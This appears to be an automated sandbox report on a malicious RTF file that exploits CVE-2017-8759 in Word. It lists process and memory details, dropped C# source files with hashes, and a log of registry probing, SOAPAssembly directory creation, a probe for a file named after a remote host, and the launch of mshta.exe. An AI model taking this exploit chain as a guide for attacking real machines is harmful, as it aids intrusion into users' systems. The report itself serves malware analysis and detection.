RTF Doc. Uses CVE-2017-8759 Exploit to Execute Code | Sequential Behavior
Try VMRay Analyzer
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
(Host: 244, Network: 20)
+
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:31, Reason: Analysis Target
Unmonitor End Time: 00:02:36, Reason: Terminated by Timeout
Monitor Duration 00:02:05
OS Process Information
+
Information Value
PID 0x9b0
Parent PID 0x52c (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010989 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A68
0x A64
0x A54
0x A30
0x A2C
0x A28
0x A24
0x A20
0x 9F4
0x 9DC
0x 9D0
0x 9CC
0x 9C4
0x 9BC
0x 9B4
0x B04
0x B08
0x B0C
0x B18
0x B24
0x B28
0x B2C
0x B54
0x B58
0x B5C
0x 0
0x B60
0x B64
0x B68
0x BD0
0x BD4
0x 95C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000040000 0x00040000 0x00043fff Pagefile Backed Memory Readable False False False
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable False False False
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable False False False
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable False False False
pagefile_0x0000000000180000 0x00180000 0x00180fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable False False False
locale.nls 0x00290000 0x002f6fff Memory Mapped File Readable False False False
pagefile_0x0000000000300000 0x00300000 0x00306fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000310000 0x00310000 0x00311fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000320000 0x00320000 0x00320fff Private Memory Readable, Writable False False False
private_0x0000000000330000 0x00330000 0x00330fff Private Memory Readable, Writable False False False
pagefile_0x0000000000340000 0x00340000 0x00341fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000350000 0x00350000 0x00351fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000360000 0x00360000 0x00362fff Pagefile Backed Memory Readable False False False
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory - False False False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory Readable, Writable False False False
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000490000 0x00490000 0x00617fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000620000 0x00620000 0x007a0fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000007b0000 0x007b0000 0x01baffff Pagefile Backed Memory Readable False False False
sortdefault.nls 0x01bb0000 0x01e7efff Memory Mapped File Readable False False False
pagefile_0x0000000001e80000 0x01e80000 0x02272fff Pagefile Backed Memory Readable False False False
private_0x0000000002280000 0x02280000 0x0237ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002380000 0x02380000 0x02382fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002390000 0x02390000 0x02392fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000023a0000 0x023a0000 0x023a2fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000023b0000 0x023b0000 0x023b2fff Pagefile Backed Memory Readable False False False
private_0x00000000023c0000 0x023c0000 0x023fffff Private Memory Readable, Writable False False False
private_0x0000000002400000 0x02400000 0x02407fff Private Memory Readable, Writable False False False
pagefile_0x0000000002410000 0x02410000 0x02411fff Pagefile Backed Memory Readable False False False
kernelbase.dll.mui 0x02420000 0x024dffff Memory Mapped File Readable, Writable False False False
private_0x00000000024e0000 0x024e0000 0x024e0fff Private Memory Readable, Writable False False False
private_0x00000000024f0000 0x024f0000 0x0256ffff Private Memory Readable, Writable False False False
private_0x0000000002570000 0x02570000 0x02570fff Private Memory Readable, Writable False False False
private_0x0000000002580000 0x02580000 0x02580fff Private Memory Readable, Writable False False False
private_0x0000000002590000 0x02590000 0x02590fff Private Memory Readable, Writable False False False
private_0x0000000002590000 0x02590000 0x0259efff Private Memory Readable, Writable True True False
private_0x00000000025a0000 0x025a0000 0x025a0fff Private Memory Readable, Writable False False False
private_0x00000000025b0000 0x025b0000 0x025bffff Private Memory Readable, Writable False False False
pagefile_0x00000000025c0000 0x025c0000 0x0269efff Pagefile Backed Memory Readable False False False
private_0x00000000026a0000 0x026a0000 0x026c7fff Private Memory Readable, Writable False False False
private_0x00000000026d0000 0x026d0000 0x0273afff Private Memory Readable, Writable False False False
private_0x0000000002720000 0x02720000 0x02721fff Private Memory Readable, Writable True True False
pagefile_0x0000000002740000 0x02740000 0x02744fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000002750000 0x02750000 0x02750fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002760000 0x02760000 0x02760fff Pagefile Backed Memory Readable False False False
private_0x0000000002770000 0x02770000 0x02770fff Private Memory Readable, Writable False False False
pagefile_0x0000000002780000 0x02780000 0x02781fff Pagefile Backed Memory Readable False False False
private_0x0000000002790000 0x02790000 0x0279ffff Private Memory Readable, Writable False False False
devobj.dll 0x027a0000 0x027b9fff Memory Mapped File Readable, Writable, Executable False False False
msxml6r.dll 0x027c0000 0x027c0fff Memory Mapped File Readable False False False
pagefile_0x00000000027d0000 0x027d0000 0x027d0fff Pagefile Backed Memory Readable, Writable False False False
private_0x00000000027e0000 0x027e0000 0x028dffff Private Memory Readable, Writable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db 0x028e0000 0x028fefff Memory Mapped File Readable False False False
private_0x0000000002900000 0x02900000 0x02900fff Private Memory Readable, Writable False False False
private_0x0000000002910000 0x02910000 0x0298ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002990000 0x02990000 0x02991fff Pagefile Backed Memory Readable False False False
c_1255.nls 0x029a0000 0x029b0fff Memory Mapped File Readable False False False
private_0x00000000029d0000 0x029d0000 0x029dffff Private Memory Readable, Writable False False False
segoeuil.ttf 0x029e0000 0x02a30fff Memory Mapped File Readable False False False
private_0x0000000002a10000 0x02a10000 0x02a10fff Private Memory Readable, Writable True True False
private_0x0000000002a20000 0x02a20000 0x02a20fff Private Memory Readable, Writable True True False
private_0x0000000002a20000 0x02a20000 0x02a3efff Private Memory Readable, Writable True True False
private_0x0000000002a30000 0x02a30000 0x02a30fff Private Memory Readable, Writable True True False
private_0x0000000002a50000 0x02a50000 0x02b4ffff Private Memory Readable, Writable False False False
private_0x0000000002b50000 0x02b50000 0x02b6ffff Private Memory - False False False
private_0x0000000002b80000 0x02b80000 0x02c7ffff Private Memory Readable, Writable False False False
private_0x0000000002c70000 0x02c70000 0x02c70fff Private Memory Readable, Writable True True False
private_0x0000000002c80000 0x02c80000 0x02e7ffff Private Memory Readable, Writable False False False
private_0x0000000002e80000 0x02e80000 0x02fb1fff Private Memory Readable, Writable False False False
private_0x0000000002e80000 0x02e80000 0x02f7ffff Private Memory Readable, Writable True True False
private_0x0000000002f80000 0x02f80000 0x02f80fff Private Memory Readable, Writable True True False
private_0x0000000002f90000 0x02f90000 0x02f90fff Private Memory Readable, Writable True True False
private_0x0000000002fa0000 0x02fa0000 0x02fa0fff Private Memory Readable, Writable True True False
private_0x0000000002fa0000 0x02fa0000 0x02faffff Private Memory Readable, Writable True True False
private_0x0000000002fb0000 0x02fb0000 0x02fb0fff Private Memory Readable, Writable True True False
private_0x0000000002fc0000 0x02fc0000 0x030bffff Private Memory Readable, Writable False False False
private_0x00000000030c0000 0x030c0000 0x030defff Private Memory Readable, Writable False False False
private_0x00000000030e0000 0x030e0000 0x031dffff Private Memory Readable, Writable False False False
private_0x00000000031e0000 0x031e0000 0x032dffff Private Memory Readable, Writable False False False
private_0x00000000032e0000 0x032e0000 0x033dffff Private Memory Readable, Writable False False False
pagefile_0x00000000033e0000 0x033e0000 0x03bdffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000003be0000 0x03be0000 0x03ddffff Private Memory Readable, Writable False False False
staticcache.dat 0x03de0000 0x0470ffff Memory Mapped File Readable False False False
segoeui.ttf 0x04710000 0x0478efff Memory Mapped File Readable False False False
private_0x0000000004790000 0x04790000 0x04790fff Private Memory Readable, Writable True True False
private_0x00000000047a0000 0x047a0000 0x0489ffff Private Memory Readable, Writable False False False
private_0x00000000048a0000 0x048a0000 0x0499ffff Private Memory Readable, Writable False False False
private_0x00000000049a0000 0x049a0000 0x049a0fff Private Memory Readable, Writable True True False
private_0x00000000049b0000 0x049b0000 0x04aaffff Private Memory Readable, Writable False False False
private_0x0000000004ab0000 0x04ab0000 0x04acffff Private Memory - False False False
private_0x0000000004af0000 0x04af0000 0x04beffff Private Memory Readable, Writable False False False
seguisb.ttf 0x04bf0000 0x04c53fff Memory Mapped File Readable False False False
private_0x0000000004c60000 0x04c60000 0x04c6ffff Private Memory Readable, Writable False False False
private_0x0000000004c90000 0x04c90000 0x04c90fff Private Memory Readable, Writable True True False
private_0x0000000004ca0000 0x04ca0000 0x04ca0fff Private Memory Readable, Writable True True False
private_0x0000000004cb0000 0x04cb0000 0x04cb0fff Private Memory Readable, Writable True True False
private_0x0000000004cc0000 0x04cc0000 0x04cc0fff Private Memory Readable, Writable True True False
private_0x0000000004cd0000 0x04cd0000 0x04dcffff Private Memory Readable, Writable False False False
private_0x0000000004dd0000 0x04dd0000 0x04dd0fff Private Memory Readable, Writable True True False
private_0x0000000004de0000 0x04de0000 0x04de0fff Private Memory Readable, Writable True True False
private_0x0000000004df0000 0x04df0000 0x04df0fff Private Memory Readable, Writable True True False
private_0x0000000004e00000 0x04e00000 0x04e7ffff Private Memory Readable, Writable, Executable False False False
pagefile_0x0000000004e80000 0x04e80000 0x0567ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000005680000 0x05680000 0x05680fff Private Memory Readable, Writable True True False
private_0x0000000005690000 0x05690000 0x05690fff Private Memory Readable, Writable True True False
private_0x00000000056a0000 0x056a0000 0x056a0fff Private Memory Readable, Writable True True False
private_0x00000000056b0000 0x056b0000 0x056b0fff Private Memory Readable, Writable True True False
private_0x00000000056c0000 0x056c0000 0x056c0fff Private Memory Readable, Writable True True False
private_0x00000000056d0000 0x056d0000 0x056d0fff Private Memory Readable, Writable True True False
private_0x00000000056e0000 0x056e0000 0x057dffff Private Memory Readable, Writable False False False
private_0x00000000057e0000 0x057e0000 0x058dffff Private Memory Readable, Writable False False False
private_0x00000000058e0000 0x058e0000 0x058e0fff Private Memory Readable, Writable True True False
private_0x00000000058e0000 0x058e0000 0x058fefff Private Memory Readable, Writable True True False
private_0x00000000058f0000 0x058f0000 0x058f0fff Private Memory Readable, Writable True True False
private_0x0000000005900000 0x05900000 0x05900fff Private Memory Readable, Writable True True False
private_0x0000000005910000 0x05910000 0x05910fff Private Memory Readable, Writable True True False
private_0x0000000005920000 0x05920000 0x05920fff Private Memory Readable, Writable True True False
private_0x0000000005930000 0x05930000 0x059affff Private Memory Readable, Writable False False False
private_0x00000000059b0000 0x059b0000 0x059b0fff Private Memory Readable, Writable True True False
private_0x00000000059c0000 0x059c0000 0x059c0fff Private Memory Readable, Writable True True False
private_0x00000000059d0000 0x059d0000 0x05a4ffff Private Memory Readable, Writable False False False
private_0x0000000005a50000 0x05a50000 0x05a50fff Private Memory Readable, Writable True True False
private_0x0000000005a50000 0x05a50000 0x05a6efff Private Memory Readable, Writable True True False
private_0x0000000005a60000 0x05a60000 0x05a60fff Private Memory Readable, Writable True True False
private_0x0000000005a70000 0x05a70000 0x05a70fff Private Memory Readable, Writable True True False
private_0x0000000005a80000 0x05a80000 0x05a8ffff Private Memory Readable, Writable False False False
private_0x0000000005a90000 0x05a90000 0x05e8ffff Private Memory Readable, Writable False False False
pagefile_0x0000000005e90000 0x05e90000 0x06e8ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000006e90000 0x06e90000 0x06e90fff Private Memory Readable, Writable True True False
private_0x0000000006e90000 0x06e90000 0x06eb0fff Private Memory Readable, Writable True True False
private_0x0000000006ea0000 0x06ea0000 0x06ea0fff Private Memory Readable, Writable True True False
private_0x0000000006eb0000 0x06eb0000 0x06eb0fff Private Memory Readable, Writable True True False
private_0x0000000006ec0000 0x06ec0000 0x06ec0fff Private Memory Readable, Writable True True False
arial.ttf 0x06f40000 0x06ffcfff Memory Mapped File Readable False False False
private_0x0000000007000000 0x07000000 0x0701efff Private Memory Readable, Writable True True False
private_0x0000000007030000 0x07030000 0x070affff Private Memory Readable, Writable False False False
private_0x00000000070b0000 0x070b0000 0x074affff Private Memory Readable, Writable False False False
private_0x00000000075b0000 0x075b0000 0x076affff Private Memory Readable, Writable False False False
private_0x00000000076b0000 0x076b0000 0x07eaffff Private Memory Readable, Writable False False False
private_0x0000000007eb0000 0x07eb0000 0x082b0fff Private Memory Readable, Writable False False False
private_0x00000000082c0000 0x082c0000 0x086c0fff Private Memory Readable, Writable False False False
private_0x00000000086d0000 0x086d0000 0x08ad0fff Private Memory Readable, Writable False False False
private_0x0000000008ae0000 0x08ae0000 0x08f9ffff Private Memory Readable, Writable False False False
private_0x0000000008fa0000 0x08fa0000 0x0939ffff Private Memory Readable, Writable False False False
private_0x0000000009400000 0x09400000 0x0941ffff Private Memory - True True False
private_0x0000000009530000 0x09530000 0x0962ffff Private Memory Readable, Writable False False False
private_0x00000000099b0000 0x099b0000 0x09aaffff Private Memory Readable, Writable True True False
private_0x0000000009ee0000 0x09ee0000 0x09fdffff Private Memory Readable, Writable True True False
private_0x0000000009fe0000 0x09fe0000 0x0a0dffff Private Memory Readable, Writable True True False
private_0x000000000a130000 0x0a130000 0x0a1affff Private Memory Readable, Writable True True False
private_0x000000000a320000 0x0a320000 0x0a39ffff Private Memory Readable, Writable, Executable True True False
private_0x000000000a3a0000 0x0a3a0000 0x0a4a0fff Private Memory Readable, Writable True True False
private_0x000000000a570000 0x0a570000 0x0a57ffff Private Memory Readable, Writable True True False
private_0x0000000022580000 0x22580000 0x22c4ffff Private Memory Readable, Writable True True False
private_0x00000000230b0000 0x230b0000 0x231affff Private Memory Readable, Writable True True False
private_0x00000000231b0000 0x231b0000 0x2341ffff Private Memory Readable, Writable True True False
private_0x00000000233a0000 0x233a0000 0x2341ffff Private Memory Readable, Writable True True False
private_0x0000000023740000 0x23740000 0x2394ffff Private Memory Readable, Writable True True False
private_0x00000000375f0000 0x375f0000 0x375fffff Private Memory Readable, Writable, Executable False False False
private_0x000000006fff0000 0x6fff0000 0x6fffffff Private Memory Readable, Writable, Executable False False False
osppc.dll 0x74d60000 0x74d92fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x775e0000 0x776d9fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x776e0000 0x777fefff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x779d0000 0x779d6fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable False False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable False False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable False False False
winword.exe 0x13f660000 0x13f83afff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007febe310000 0x7febe310000 0x7febe31ffff Private Memory Readable, Writable, Executable False False False
chart.dll 0x7fee4420000 0x7fee4f18fff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x7fee4f20000 0x7fee5142fff Memory Mapped File Readable, Writable, Executable False False False
dwrite.dll 0x7fee5390000 0x7fee550dfff Memory Mapped File Readable, Writable, Executable False False False
d3d10warp.dll 0x7fee5510000 0x7fee56dffff Memory Mapped File Readable, Writable, Executable False False False
msptls.dll 0x7fee56e0000 0x7fee584ffff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x7fee5850000 0x7fee59cafff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x7fee59d0000 0x7feea80efff Memory Mapped File Readable, Writable, Executable False False False
mso99lres.dll 0x7feea810000 0x7feeb130fff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x7feeb140000 0x7feec41bfff Memory Mapped File Readable, Writable, Executable False False False
mso99lwin32client.dll 0x7feec420000 0x7feecbebfff Memory Mapped File Readable, Writable, Executable False False False
mso40uiwin32client.dll 0x7feecbf0000 0x7feed4dafff Memory Mapped File Readable, Writable, Executable False False False
mso30win32client.dll 0x7feed4e0000 0x7feed957fff Memory Mapped File Readable, Writable, Executable False False False
mso20win32client.dll 0x7feed960000 0x7feedc63fff Memory Mapped File Readable, Writable, Executable False False False
oart.dll 0x7feedc70000 0x7feeeddbfff Memory Mapped File Readable, Writable, Executable False False False
d3d11.dll 0x7feeede0000 0x7feeeea5fff Memory Mapped File Readable, Writable, Executable False False False
wwlib.dll 0x7feeeeb0000 0x7fef124efff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x7fef13f0000 0x7fef1488fff Memory Mapped File Readable, Writable, Executable False False False
mso40uires.dll 0x7fef1490000 0x7fef1797fff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x7fef1910000 0x7fef197efff Memory Mapped File Readable, Writable, Executable False False False
wwintl.dll 0x7fef1980000 0x7fef1a3bfff Memory Mapped File Readable, Writable, Executable False False False
mlang.dll 0x7fef1aa0000 0x7fef1adafff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x7fef3c70000 0x7fef3c7bfff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x7fef4210000 0x7fef4280fff Memory Mapped File Readable, Writable, Executable False False False
msxml6.dll 0x7fef49b0000 0x7fef4ba1fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l1-2-0.dll 0x7fef5310000 0x7fef5312fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-processthreads-l1-1-1.dll 0x7fef5320000 0x7fef5322fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-synch-l1-2-0.dll 0x7fef5330000 0x7fef5332fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-localization-l1-2-0.dll 0x7fef5370000 0x7fef5372fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l2-1-0.dll 0x7fef5380000 0x7fef5382fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-timezone-l1-1-0.dll 0x7fef5550000 0x7fef5552fff Memory Mapped File Readable, Writable, Executable False False False
ucrtbase.dll 0x7fef55a0000 0x7fef5691fff Memory Mapped File Readable, Writable, Executable False False False
msimg32.dll 0x7fef5850000 0x7fef5856fff Memory Mapped File Readable, Writable, Executable False False False
c2r64.dll 0x7fef5860000 0x7fef5988fff Memory Mapped File Readable, Writable, Executable False False False
appvisvstream64.dll 0x7fef5990000 0x7fef5a09fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007ff00050000 0x7ff00050000 0x7ff0005ffff Private Memory - True True False
private_0x000007ff00100000 0x7ff00100000 0x7ff0010ffff Private Memory - True True False
private_0x000007ff00110000 0x7ff00110000 0x7ff0017ffff Private Memory - True True False
private_0x000007ff00180000 0x7ff00180000 0x7ff0018ffff Private Memory - True True False
private_0x000007ff00190000 0x7ff00190000 0x7ff0019ffff Private Memory - True True False
private_0x000007ffffec0000 0x7ffffec0000 0x7ffffecffff Private Memory Readable, Writable, Executable True True False
private_0x000007ffffed0000 0x7ffffed0000 0x7fffff5ffff Private Memory Readable, Writable, Executable True True False
private_0x000007fffff66000 0x7fffff66000 0x7fffff67fff Private Memory Readable, Writable True True False
private_0x000007fffff68000 0x7fffff68000 0x7fffff69fff Private Memory Readable, Writable True True False
private_0x000007fffff6a000 0x7fffff6a000 0x7fffff6bfff Private Memory Readable, Writable True True False
private_0x000007fffff6c000 0x7fffff6c000 0x7fffff6dfff Private Memory Readable, Writable True True False
private_0x000007fffff6e000 0x7fffff6e000 0x7fffff6ffff Private Memory Readable, Writable True True False
private_0x000007fffff70000 0x7fffff70000 0x7fffff71fff Private Memory Readable, Writable True True False
private_0x000007fffff72000 0x7fffff72000 0x7fffff73fff Private Memory Readable, Writable True True False
private_0x000007fffff74000 0x7fffff74000 0x7fffff75fff Private Memory Readable, Writable True True False
private_0x000007fffff76000 0x7fffff76000 0x7fffff77fff Private Memory Readable, Writable True True False
private_0x000007fffff78000 0x7fffff78000 0x7fffff79fff Private Memory Readable, Writable True True False
private_0x000007fffff7a000 0x7fffff7a000 0x7fffff7bfff Private Memory Readable, Writable True True False
For performance reasons, the remaining 264 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\desktop\logo.cs 1.07 KB (1098 bytes) MD5: 667a8968a36880dc4147d2ce00c64b30
SHA1: 48233228f9babdd3bcac5b85d5ae258f91204f7e
SHA256: 8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd
False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.tmp 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.err 0.00 KB (0 bytes) MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.0.cs 1.08 KB (1101 bytes) MD5: 3992ea6c0751d769815a98c4cffcadce
SHA1: 6ba244d7eb6a6facd2b4c4e946e26987d2336e8b
SHA256: b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc
False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.cmdline 0.28 KB (288 bytes) MD5: 8d42a6a6ddda3cb8546ef4cb888dbfa8
SHA1: 2024365b4311bc93867119ceee7c876683fef607
SHA256: f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e
False
c:\users\aetadzjz\appdata\local\temp\91rxrejg.out 0.37 KB (379 bytes) MD5: 51bfb6f473aa25324ee1ed9830ca806e
SHA1: f1fae130030df5b4dff15ed820ca35665886ea98
SHA256: 60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e
False
Threads
Thread 0x9b4
(Host: 113, Network: 0)
+
Category Operation Information Success Count Logfile
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
System Get Info type = Operating System False 1
Fn
File Get Info filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\com, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows, type = file_attributes True 1
Fn
File Create Directory C:\Windows\system32\com\SOAPAssembly False 1
Fn
System Get Info type = Operating System False 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes False 1
Fn
Process Create process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
File Get Info filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\com, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows, type = file_attributes True 1
Fn
File Create Directory C:\Windows\system32\com\SOAPAssembly False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
